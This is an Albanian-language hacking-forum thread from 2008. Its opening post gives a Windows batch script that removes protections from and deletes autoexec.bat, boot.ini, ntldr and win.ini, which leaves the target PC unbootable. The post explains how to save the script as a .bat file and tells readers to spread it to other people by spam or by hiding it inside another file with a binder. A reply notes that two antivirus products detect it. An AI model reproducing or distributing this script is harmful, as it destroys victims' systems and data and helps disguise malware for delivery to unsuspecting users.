Kosova Hacker

Computers and Internet


You are not connected. Please login or register

Fike nje PC te huaj...pergjithmone

Go down  Message [Page 1 of 1]

1 Fike nje PC te huaj...pergjithmone on Mon Mar 24, 2008 2:07 pm

lindaa41

avatar
Junior Member
Junior Member
Fillimisht ,unė nuk mbajė pėrgjegjsi per dėmet qė mundė ti shkaktoni ju.
Hapim Notepadin dhe vendosim kėtė kodė:
---------------------------------------------------------
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
-----------------------------------------------------------
E ruajmė kėtė fajll me qfardo emri mirpo me prapashtesen .bat pra emri.bat
Pėr ta ruajtur si bat file tek rubrika Text file document ndrrojeni ne All files.
Kujdes! Mos e hapni kėtė fajll ne PC tuaj.
Tash ju mbetet ta shperndani si tė dėshironi ju ,me spam apo edhe tia bashkangjitni njė fajlli tjetėr me ndonjė file binder.

View user profile

2 Re: Fike nje PC te huaj...pergjithmone on Thu Mar 27, 2008 6:45 am

heroid

avatar
General
General
shum san osht qikjo po e ngjojin dy antivirusa mc affe edhe avast

najc post

hajt me tmira

View user profile

Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum